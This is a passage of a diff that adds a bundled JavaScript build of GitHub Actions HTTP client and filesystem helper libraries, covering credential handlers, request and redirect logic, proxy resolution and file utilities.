(e) { reject(e); } } + function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.PersonalAccessTokenCredentialHandler = exports.BearerCredentialHandler = exports.BasicCredentialHandler = void 0; +class BasicCredentialHandler { + constructor(username, password) { + this.username = username; + this.password = password; + } + prepareRequest(options) { + if (!options.headers) { + throw Error('The request has no headers'); + } + options.headers['Authorization'] = `Basic ${Buffer.from(`${this.username}:${this.password}`).toString('base64')}`; + } + // This handler cannot handle 401 + canHandleAuthentication() { + return false; + } + handleAuthentication() { + return __awaiter(this, void 0, void 0, function* () { + throw new Error('not implemented'); + }); + } +} +exports.BasicCredentialHandler = BasicCredentialHandler; +class BearerCredentialHandler { + constructor(token) { + this.token = token; + } + // currently implements pre-authorization + // TODO: support preAuth = false where it hooks on 401 + prepareRequest(options) { + if (!options.headers) { + throw Error('The request has no headers'); + } + options.headers['Authorization'] = `Bearer ${this.token}`; + } + // This handler cannot handle 401 + canHandleAuthentication() { + return false; + } + handleAuthentication() { + return __awaiter(this, void 0, void 0, function* () { + throw new Error('not implemented'); + }); + } +} +exports.BearerCredentialHandler = BearerCredentialHandler; +class PersonalAccessTokenCredentialHandler { + constructor(token) { + this.token = token; + } + // currently implements pre-authorization + // TODO: support preAuth = false where it hooks on 401 + prepareRequest(options) { + if (!options.headers) { + throw Error('The request has no headers'); + } + options.headers['Authorization'] = `Basic 
${Buffer.from(`PAT:${this.token}`).toString('base64')}`; + } + // This handler cannot handle 401 + canHandleAuthentication() { + return false; + } + handleAuthentication() { + return __awaiter(this, void 0, void 0, function* () { + throw new Error('not implemented'); + }); + } +} +exports.PersonalAccessTokenCredentialHandler = PersonalAccessTokenCredentialHandler; +//# sourceMappingURL=auth.js.map + +/***/ }), + +/***/ 6255: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +/* eslint-disable @typescript-eslint/no-explicit-any */ +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.HttpClient = exports.isHttps = exports.HttpClientResponse = exports.HttpClientError = exports.getProxyUrl = exports.MediaTypes = exports.Headers = exports.HttpCodes = void 0; +const http = __importStar(__nccwpck_require__(3685)); +const https = __importStar(__nccwpck_require__(5687)); +const pm = __importStar(__nccwpck_require__(9835)); +const tunnel = __importStar(__nccwpck_require__(4294)); +const undici_1 = __nccwpck_require__(1773); +var HttpCodes; +(function (HttpCodes) { + HttpCodes[HttpCodes["OK"] = 200] = "OK"; + HttpCodes[HttpCodes["MultipleChoices"] = 300] = "MultipleChoices"; + HttpCodes[HttpCodes["MovedPermanently"] = 301] = "MovedPermanently"; + HttpCodes[HttpCodes["ResourceMoved"] = 302] = "ResourceMoved"; + HttpCodes[HttpCodes["SeeOther"] = 303] = "SeeOther"; + HttpCodes[HttpCodes["NotModified"] = 304] = "NotModified"; + HttpCodes[HttpCodes["UseProxy"] = 305] = "UseProxy"; + HttpCodes[HttpCodes["SwitchProxy"] = 306] = "SwitchProxy"; + HttpCodes[HttpCodes["TemporaryRedirect"] = 307] = "TemporaryRedirect"; + HttpCodes[HttpCodes["PermanentRedirect"] = 308] = "PermanentRedirect"; + HttpCodes[HttpCodes["BadRequest"] = 400] = "BadRequest"; + HttpCodes[HttpCodes["Unauthorized"] = 401] = "Unauthorized"; + HttpCodes[HttpCodes["PaymentRequired"] = 402] = "PaymentRequired"; + HttpCodes[HttpCodes["Forbidden"] = 403] = "Forbidden"; + HttpCodes[HttpCodes["NotFound"] = 404] = "NotFound"; + 
HttpCodes[HttpCodes["MethodNotAllowed"] = 405] = "MethodNotAllowed"; + HttpCodes[HttpCodes["NotAcceptable"] = 406] = "NotAcceptable"; + HttpCodes[HttpCodes["ProxyAuthenticationRequired"] = 407] = "ProxyAuthenticationRequired"; + HttpCodes[HttpCodes["RequestTimeout"] = 408] = "RequestTimeout"; + HttpCodes[HttpCodes["Conflict"] = 409] = "Conflict"; + HttpCodes[HttpCodes["Gone"] = 410] = "Gone"; + HttpCodes[HttpCodes["TooManyRequests"] = 429] = "TooManyRequests"; + HttpCodes[HttpCodes["InternalServerError"] = 500] = "InternalServerError"; + HttpCodes[HttpCodes["NotImplemented"] = 501] = "NotImplemented"; + HttpCodes[HttpCodes["BadGateway"] = 502] = "BadGateway"; + HttpCodes[HttpCodes["ServiceUnavailable"] = 503] = "ServiceUnavailable"; + HttpCodes[HttpCodes["GatewayTimeout"] = 504] = "GatewayTimeout"; +})(HttpCodes || (exports.HttpCodes = HttpCodes = {})); +var Headers; +(function (Headers) { + Headers["Accept"] = "accept"; + Headers["ContentType"] = "content-type"; +})(Headers || (exports.Headers = Headers = {})); +var MediaTypes; +(function (MediaTypes) { + MediaTypes["ApplicationJson"] = "application/json"; +})(MediaTypes || (exports.MediaTypes = MediaTypes = {})); +/** + * Returns the proxy URL, depending upon the supplied url and proxy environment variables. + * @param serverUrl The server URL where the request will be sent. For example, https://api.github.com + */ +function getProxyUrl(serverUrl) { + const proxyUrl = pm.getProxyUrl(new URL(serverUrl)); + return proxyUrl ? 
proxyUrl.href : ''; +} +exports.getProxyUrl = getProxyUrl; +const HttpRedirectCodes = [ + HttpCodes.MovedPermanently, + HttpCodes.ResourceMoved, + HttpCodes.SeeOther, + HttpCodes.TemporaryRedirect, + HttpCodes.PermanentRedirect +]; +const HttpResponseRetryCodes = [ + HttpCodes.BadGateway, + HttpCodes.ServiceUnavailable, + HttpCodes.GatewayTimeout +]; +const RetryableHttpVerbs = ['OPTIONS', 'GET', 'DELETE', 'HEAD']; +const ExponentialBackoffCeiling = 10; +const ExponentialBackoffTimeSlice = 5; +class HttpClientError extends Error { + constructor(message, statusCode) { + super(message); + this.name = 'HttpClientError'; + this.statusCode = statusCode; + Object.setPrototypeOf(this, HttpClientError.prototype); + } +} +exports.HttpClientError = HttpClientError; +class HttpClientResponse { + constructor(message) { + this.message = message; + } + readBody() { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { + let output = Buffer.alloc(0); + this.message.on('data', (chunk) => { + output = Buffer.concat([output, chunk]); + }); + this.message.on('end', () => { + resolve(output.toString()); + }); + })); + }); + } + readBodyBuffer() { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { + const chunks = []; + this.message.on('data', (chunk) => { + chunks.push(chunk); + }); + this.message.on('end', () => { + resolve(Buffer.concat(chunks)); + }); + })); + }); + } +} +exports.HttpClientResponse = HttpClientResponse; +function isHttps(requestUrl) { + const parsedUrl = new URL(requestUrl); + return parsedUrl.protocol === 'https:'; +} +exports.isHttps = isHttps; +class HttpClient { + constructor(userAgent, handlers, requestOptions) { + this._ignoreSslError = false; + this._allowRedirects = true; + this._allowRedirectDowngrade = false; + this._maxRedirects = 50; + this._allowRetries = false; + this._maxRetries = 1; 
+ this._keepAlive = false; + this._disposed = false; + this.userAgent = userAgent; + this.handlers = handlers || []; + this.requestOptions = requestOptions; + if (requestOptions) { + if (requestOptions.ignoreSslError != null) { + this._ignoreSslError = requestOptions.ignoreSslError; + } + this._socketTimeout = requestOptions.socketTimeout; + if (requestOptions.allowRedirects != null) { + this._allowRedirects = requestOptions.allowRedirects; + } + if (requestOptions.allowRedirectDowngrade != null) { + this._allowRedirectDowngrade = requestOptions.allowRedirectDowngrade; + } + if (requestOptions.maxRedirects != null) { + this._maxRedirects = Math.max(requestOptions.maxRedirects, 0); + } + if (requestOptions.keepAlive != null) { + this._keepAlive = requestOptions.keepAlive; + } + if (requestOptions.allowRetries != null) { + this._allowRetries = requestOptions.allowRetries; + } + if (requestOptions.maxRetries != null) { + this._maxRetries = requestOptions.maxRetries; + } + } + } + options(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('OPTIONS', requestUrl, null, additionalHeaders || {}); + }); + } + get(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('GET', requestUrl, null, additionalHeaders || {}); + }); + } + del(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('DELETE', requestUrl, null, additionalHeaders || {}); + }); + } + post(requestUrl, data, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('POST', requestUrl, data, additionalHeaders || {}); + }); + } + patch(requestUrl, data, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('PATCH', requestUrl, data, additionalHeaders || {}); + }); + } + put(requestUrl, data, additionalHeaders) { + return __awaiter(this, void 0, void 0, 
function* () { + return this.request('PUT', requestUrl, data, additionalHeaders || {}); + }); + } + head(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('HEAD', requestUrl, null, additionalHeaders || {}); + }); + } + sendStream(verb, requestUrl, stream, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request(verb, requestUrl, stream, additionalHeaders); + }); + } + /** + * Gets a typed object from an endpoint + * Be aware that not found returns a null. Other errors (4xx, 5xx) reject the promise + */ + getJson(requestUrl, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + const res = yield this.get(requestUrl, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + postJson(requestUrl, obj, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + const data = JSON.stringify(obj, null, 2); + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); + const res = yield this.post(requestUrl, data, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + putJson(requestUrl, obj, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + const data = JSON.stringify(obj, null, 2); + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); + const res = 
yield this.put(requestUrl, data, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + patchJson(requestUrl, obj, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + const data = JSON.stringify(obj, null, 2); + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); + const res = yield this.patch(requestUrl, data, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + /** + * Makes a raw http request. + * All other methods such as get, post, patch, and request ultimately call this. + * Prefer get, del, post and patch + */ + request(verb, requestUrl, data, headers) { + return __awaiter(this, void 0, void 0, function* () { + if (this._disposed) { + throw new Error('Client has already been disposed.'); + } + const parsedUrl = new URL(requestUrl); + let info = this._prepareRequest(verb, parsedUrl, headers); + // Only perform retries on reads since writes may not be idempotent. + const maxTries = this._allowRetries && RetryableHttpVerbs.includes(verb) + ? this._maxRetries + 1 + : 1; + let numTries = 0; + let response; + do { + response = yield this.requestRaw(info, data); + // Check if it's an authentication challenge + if (response && + response.message && + response.message.statusCode === HttpCodes.Unauthorized) { + let authenticationHandler; + for (const handler of this.handlers) { + if (handler.canHandleAuthentication(response)) { + authenticationHandler = handler; + break; + } + } + if (authenticationHandler) { + return authenticationHandler.handleAuthentication(this, info, data); + } + else { + // We have received an unauthorized response but have no handlers to handle it. + // Let the response return to the caller. 
+ return response; + } + } + let redirectsRemaining = this._maxRedirects; + while (response.message.statusCode && + HttpRedirectCodes.includes(response.message.statusCode) && + this._allowRedirects && + redirectsRemaining > 0) { + const redirectUrl = response.message.headers['location']; + if (!redirectUrl) { + // if there's no location to redirect to, we won't + break; + } + const parsedRedirectUrl = new URL(redirectUrl); + if (parsedUrl.protocol === 'https:' && + parsedUrl.protocol !== parsedRedirectUrl.protocol && + !this._allowRedirectDowngrade) { + throw new Error('Redirect from HTTPS to HTTP protocol. This downgrade is not allowed for security reasons. If you want to allow this behavior, set the allowRedirectDowngrade option to true.'); + } + // we need to finish reading the response before reassigning response + // which will leak the open socket. + yield response.readBody(); + // strip authorization header if redirected to a different hostname + if (parsedRedirectUrl.hostname !== parsedUrl.hostname) { + for (const header in headers) { + // header names are case insensitive + if (header.toLowerCase() === 'authorization') { + delete headers[header]; + } + } + } + // let's make the request with the new redirectUrl + info = this._prepareRequest(verb, parsedRedirectUrl, headers); + response = yield this.requestRaw(info, data); + redirectsRemaining--; + } + if (!response.message.statusCode || + !HttpResponseRetryCodes.includes(response.message.statusCode)) { + // If not a retry code, return immediately instead of retrying + return response; + } + numTries += 1; + if (numTries < maxTries) { + yield response.readBody(); + yield this._performExponentialBackoff(numTries); + } + } while (numTries < maxTries); + return response; + }); + } + /** + * Needs to be called if keepAlive is set to true in request options. + */ + dispose() { + if (this._agent) { + this._agent.destroy(); + } + this._disposed = true; + } + /** + * Raw request. 
+ * @param info + * @param data + */ + requestRaw(info, data) { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve, reject) => { + function callbackForResult(err, res) { + if (err) { + reject(err); + } + else if (!res) { + // If `err` is not passed, then `res` must be passed. + reject(new Error('Unknown error')); + } + else { + resolve(res); + } + } + this.requestRawWithCallback(info, data, callbackForResult); + }); + }); + } + /** + * Raw request with callback. + * @param info + * @param data + * @param onResult + */ + requestRawWithCallback(info, data, onResult) { + if (typeof data === 'string') { + if (!info.options.headers) { + info.options.headers = {}; + } + info.options.headers['Content-Length'] = Buffer.byteLength(data, 'utf8'); + } + let callbackCalled = false; + function handleResult(err, res) { + if (!callbackCalled) { + callbackCalled = true; + onResult(err, res); + } + } + const req = info.httpModule.request(info.options, (msg) => { + const res = new HttpClientResponse(msg); + handleResult(undefined, res); + }); + let socket; + req.on('socket', sock => { + socket = sock; + }); + // If we ever get disconnected, we want the socket to timeout eventually + req.setTimeout(this._socketTimeout || 3 * 60000, () => { + if (socket) { + socket.end(); + } + handleResult(new Error(`Request timeout: ${info.options.path}`)); + }); + req.on('error', function (err) { + // err has statusCode property + // res should have headers + handleResult(err); + }); + if (data && typeof data === 'string') { + req.write(data, 'utf8'); + } + if (data && typeof data !== 'string') { + data.on('close', function () { + req.end(); + }); + data.pipe(req); + } + else { + req.end(); + } + } + /** + * Gets an http agent. This function is useful when you need an http agent that handles + * routing through a proxy server - depending upon the url and proxy environment variables. + * @param serverUrl The server URL where the request will be sent. 
For example, https://api.github.com + */ + getAgent(serverUrl) { + const parsedUrl = new URL(serverUrl); + return this._getAgent(parsedUrl); + } + getAgentDispatcher(serverUrl) { + const parsedUrl = new URL(serverUrl); + const proxyUrl = pm.getProxyUrl(parsedUrl); + const useProxy = proxyUrl && proxyUrl.hostname; + if (!useProxy) { + return; + } + return this._getProxyAgentDispatcher(parsedUrl, proxyUrl); + } + _prepareRequest(method, requestUrl, headers) { + const info = {}; + info.parsedUrl = requestUrl; + const usingSsl = info.parsedUrl.protocol === 'https:'; + info.httpModule = usingSsl ? https : http; + const defaultPort = usingSsl ? 443 : 80; + info.options = {}; + info.options.host = info.parsedUrl.hostname; + info.options.port = info.parsedUrl.port + ? parseInt(info.parsedUrl.port) + : defaultPort; + info.options.path = + (info.parsedUrl.pathname || '') + (info.parsedUrl.search || ''); + info.options.method = method; + info.options.headers = this._mergeHeaders(headers); + if (this.userAgent != null) { + info.options.headers['user-agent'] = this.userAgent; + } + info.options.agent = this._getAgent(info.parsedUrl); + // gives handlers an opportunity to participate + if (this.handlers) { + for (const handler of this.handlers) { + handler.prepareRequest(info.options); + } + } + return info; + } + _mergeHeaders(headers) { + if (this.requestOptions && this.requestOptions.headers) { + return Object.assign({}, lowercaseKeys(this.requestOptions.headers), lowercaseKeys(headers || {})); + } + return lowercaseKeys(headers || {}); + } + _getExistingOrDefaultHeader(additionalHeaders, header, _default) { + let clientHeader; + if (this.requestOptions && this.requestOptions.headers) { + clientHeader = lowercaseKeys(this.requestOptions.headers)[header]; + } + return additionalHeaders[header] || clientHeader || _default; + } + _getAgent(parsedUrl) { + let agent; + const proxyUrl = pm.getProxyUrl(parsedUrl); + const useProxy = proxyUrl && proxyUrl.hostname; + if 
(this._keepAlive && useProxy) { + agent = this._proxyAgent; + } + if (this._keepAlive && !useProxy) { + agent = this._agent; + } + // if agent is already assigned use that agent. + if (agent) { + return agent; + } + const usingSsl = parsedUrl.protocol === 'https:'; + let maxSockets = 100; + if (this.requestOptions) { + maxSockets = this.requestOptions.maxSockets || http.globalAgent.maxSockets; + } + // This is `useProxy` again, but we need to check `proxyURl` directly for TypeScripts's flow analysis. + if (proxyUrl && proxyUrl.hostname) { + const agentOptions = { + maxSockets, + keepAlive: this._keepAlive, + proxy: Object.assign(Object.assign({}, ((proxyUrl.username || proxyUrl.password) && { + proxyAuth: `${proxyUrl.username}:${proxyUrl.password}` + })), { host: proxyUrl.hostname, port: proxyUrl.port }) + }; + let tunnelAgent; + const overHttps = proxyUrl.protocol === 'https:'; + if (usingSsl) { + tunnelAgent = overHttps ? tunnel.httpsOverHttps : tunnel.httpsOverHttp; + } + else { + tunnelAgent = overHttps ? tunnel.httpOverHttps : tunnel.httpOverHttp; + } + agent = tunnelAgent(agentOptions); + this._proxyAgent = agent; + } + // if reusing agent across request and tunneling agent isn't assigned create a new agent + if (this._keepAlive && !agent) { + const options = { keepAlive: this._keepAlive, maxSockets }; + agent = usingSsl ? new https.Agent(options) : new http.Agent(options); + this._agent = agent; + } + // if not using private agent and tunnel agent isn't setup then use global agent + if (!agent) { + agent = usingSsl ? 
https.globalAgent : http.globalAgent; + } + if (usingSsl && this._ignoreSslError) { + // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process + // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options + // we have to cast it to any and change it directly + agent.options = Object.assign(agent.options || {}, { + rejectUnauthorized: false + }); + } + return agent; + } + _getProxyAgentDispatcher(parsedUrl, proxyUrl) { + let proxyAgent; + if (this._keepAlive) { + proxyAgent = this._proxyAgentDispatcher; + } + // if agent is already assigned use that agent. + if (proxyAgent) { + return proxyAgent; + } + const usingSsl = parsedUrl.protocol === 'https:'; + proxyAgent = new undici_1.ProxyAgent(Object.assign({ uri: proxyUrl.href, pipelining: !this._keepAlive ? 0 : 1 }, ((proxyUrl.username || proxyUrl.password) && { + token: `${proxyUrl.username}:${proxyUrl.password}` + }))); + this._proxyAgentDispatcher = proxyAgent; + if (usingSsl && this._ignoreSslError) { + // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process + // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options + // we have to cast it to any and change it directly + proxyAgent.options = Object.assign(proxyAgent.options.requestTls || {}, { + rejectUnauthorized: false + }); + } + return proxyAgent; + } + _performExponentialBackoff(retryNumber) { + return __awaiter(this, void 0, void 0, function* () { + retryNumber = Math.min(ExponentialBackoffCeiling, retryNumber); + const ms = ExponentialBackoffTimeSlice * Math.pow(2, retryNumber); + return new Promise(resolve => setTimeout(() => resolve(), ms)); + }); + } + _processResponse(res, options) { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { + const statusCode = res.message.statusCode || 0; + const response = { + statusCode, 
+ result: null, + headers: {} + }; + // not found leads to null obj returned + if (statusCode === HttpCodes.NotFound) { + resolve(response); + } + // get the result from the body + function dateTimeDeserializer(key, value) { + if (typeof value === 'string') { + const a = new Date(value); + if (!isNaN(a.valueOf())) { + return a; + } + } + return value; + } + let obj; + let contents; + try { + contents = yield res.readBody(); + if (contents && contents.length > 0) { + if (options && options.deserializeDates) { + obj = JSON.parse(contents, dateTimeDeserializer); + } + else { + obj = JSON.parse(contents); + } + response.result = obj; + } + response.headers = res.message.headers; + } + catch (err) { + // Invalid resource (contents not json); leaving result obj null + } + // note that 3xx redirects are handled by the http layer. + if (statusCode > 299) { + let msg; + // if exception/error in body, attempt to get better error + if (obj && obj.message) { + msg = obj.message; + } + else if (contents && contents.length > 0) { + // it may be the case that the exception is in the body message as string + msg = contents; + } + else { + msg = `Failed request: (${statusCode})`; + } + const err = new HttpClientError(msg, statusCode); + err.result = response.result; + reject(err); + } + else { + resolve(response); + } + })); + }); + } +} +exports.HttpClient = HttpClient; +const lowercaseKeys = (obj) => Object.keys(obj).reduce((c, k) => ((c[k.toLowerCase()] = obj[k]), c), {}); +//# sourceMappingURL=index.js.map + +/***/ }), + +/***/ 9835: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.checkBypass = exports.getProxyUrl = void 0; +function getProxyUrl(reqUrl) { + const usingSsl = reqUrl.protocol === 'https:'; + if (checkBypass(reqUrl)) { + return undefined; + } + const proxyVar = (() => { + if (usingSsl) { + return process.env['https_proxy'] || process.env['HTTPS_PROXY']; + } + else { + 
return process.env['http_proxy'] || process.env['HTTP_PROXY']; + } + })(); + if (proxyVar) { + try { + return new URL(proxyVar); + } + catch (_a) { + if (!proxyVar.startsWith('http://') && !proxyVar.startsWith('https://')) + return new URL(`http://${proxyVar}`); + } + } + else { + return undefined; + } +} +exports.getProxyUrl = getProxyUrl; +function checkBypass(reqUrl) { + if (!reqUrl.hostname) { + return false; + } + const reqHost = reqUrl.hostname; + if (isLoopbackAddress(reqHost)) { + return true; + } + const noProxy = process.env['no_proxy'] || process.env['NO_PROXY'] || ''; + if (!noProxy) { + return false; + } + // Determine the request port + let reqPort; + if (reqUrl.port) { + reqPort = Number(reqUrl.port); + } + else if (reqUrl.protocol === 'http:') { + reqPort = 80; + } + else if (reqUrl.protocol === 'https:') { + reqPort = 443; + } + // Format the request hostname and hostname with port + const upperReqHosts = [reqUrl.hostname.toUpperCase()]; + if (typeof reqPort === 'number') { + upperReqHosts.push(`${upperReqHosts[0]}:${reqPort}`); + } + // Compare request host against noproxy + for (const upperNoProxyItem of noProxy + .split(',') + .map(x => x.trim().toUpperCase()) + .filter(x => x)) { + if (upperNoProxyItem === '*' || + upperReqHosts.some(x => x === upperNoProxyItem || + x.endsWith(`.${upperNoProxyItem}`) || + (upperNoProxyItem.startsWith('.') && + x.endsWith(`${upperNoProxyItem}`)))) { + return true; + } + } + return false; +} +exports.checkBypass = checkBypass; +function isLoopbackAddress(host) { + const hostLower = host.toLowerCase(); + return (hostLower === 'localhost' || + hostLower.startsWith('127.') || + hostLower.startsWith('[::1]') || + hostLower.startsWith('[0:0:0:0:0:0:0:1]')); +} +//# sourceMappingURL=proxy.js.map + +/***/ }), + +/***/ 1962: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? 
(function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +var _a; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.getCmdPath = exports.tryGetExecutablePath = exports.isRooted = exports.isDirectory = exports.exists = exports.READONLY = exports.UV_FS_O_EXLOCK = exports.IS_WINDOWS = exports.unlink = exports.symlink = exports.stat = exports.rmdir = exports.rm = exports.rename = exports.readlink = exports.readdir = exports.open = exports.mkdir = exports.lstat = exports.copyFile = exports.chmod = void 0; +const fs = __importStar(__nccwpck_require__(7147)); +const path = __importStar(__nccwpck_require__(1017)); +_a = fs.promises +// export const {open} = 'fs' +, exports.chmod = _a.chmod, exports.copyFile = _a.copyFile, exports.lstat = _a.lstat, exports.mkdir = _a.mkdir, exports.open = _a.open, exports.readdir = _a.readdir, exports.readlink = _a.readlink, exports.rename = _a.rename, exports.rm = _a.rm, exports.rmdir = _a.rmdir, exports.stat = _a.stat, exports.symlink = _a.symlink, exports.unlink = _a.unlink; +// export const {open} = 'fs' +exports.IS_WINDOWS = process.platform === 'win32'; +// See https://github.com/nodejs/node/blob/d0153aee367422d0858105abec186da4dff0a0c5/deps/uv/include/uv/win.h#L691 +exports.UV_FS_O_EXLOCK = 0x10000000; +exports.READONLY = fs.constants.O_RDONLY; +function exists(fsPath) { + return __awaiter(this, void 0, void 0, function* () { + try { + yield exports.stat(fsPath); + } + catch (err) { + if (err.code === 'ENOENT') { + return false; + } + throw err; + } + return true; + }); +} +exports.exists = exists; +function isDirectory(fsPath, useStat = false) { + return __awaiter(this, void 0, void 0, function* () { + const stats = useStat ? yield exports.stat(fsPath) : yield exports.lstat(fsPath); + return stats.isDirectory(); + }); +} +exports.isDirectory = isDirectory; +/** + * On OSX/Linux, true if path starts with '/'. 
On Windows, true for paths like: + * \, \hello, \\hello\share, C:, and C:\hello (and corresponding alternate separator cases). + */ +function isRooted(p) { + p = normalizeSeparators(p); + if (!p) { + throw new Error('isRooted() parameter "p" cannot be empty'); + } + if (exports.IS_WINDOWS) { + return (p.startsWith('\\') || /^[A-Z]:/i.test(p) // e.g. \ or \hello or \\hello + ); // e.g. C: or C:\hello + } + return p.startsWith('/'); +} +exports.isRooted = isRooted; +/** + * Best effort attempt to determine whether a file exists and is executable. + * @param filePath file path to check + * @param extensions additional file extensions to try + * @return if file exists and is executable, returns the file path. otherwise empty string. + */ +function tryGetExecutablePath(filePath, extensions) { + return __awaiter(this, void 0, void 0, function* () { + let stats = undefined; + try { + // test file exists + stats = yield exports.stat(filePath); + } + catch (err) { + if (err.code !== 'ENOENT') { + // eslint-disable-next-line no-console + console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); + } + } + if (stats && stats.isFile()) { + if (exports.IS_WINDOWS) { + // on Windows, test for valid extension + const upperExt = path.extname(filePath).toUpperCase(); + if (extensions.some(validExt => validExt.toUpperCase() === upperExt)) { + return filePath; + } + } + else { + if (isUnixExecutable(stats)) { + return filePath; + } + } + } + // try each extension + const originalFilePath = filePath; + for (const extension of extensions) { + filePath = originalFilePath + extension; + stats = undefined; + try { + stats = yield exports.stat(filePath); + } + catch (err) { + if (err.code !== 'ENOENT') { + // eslint-disable-next-line no-console + console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); + } + } + if (stats && stats.isFile()) { + if (exports.IS_WINDOWS) { + // preserve the case of 
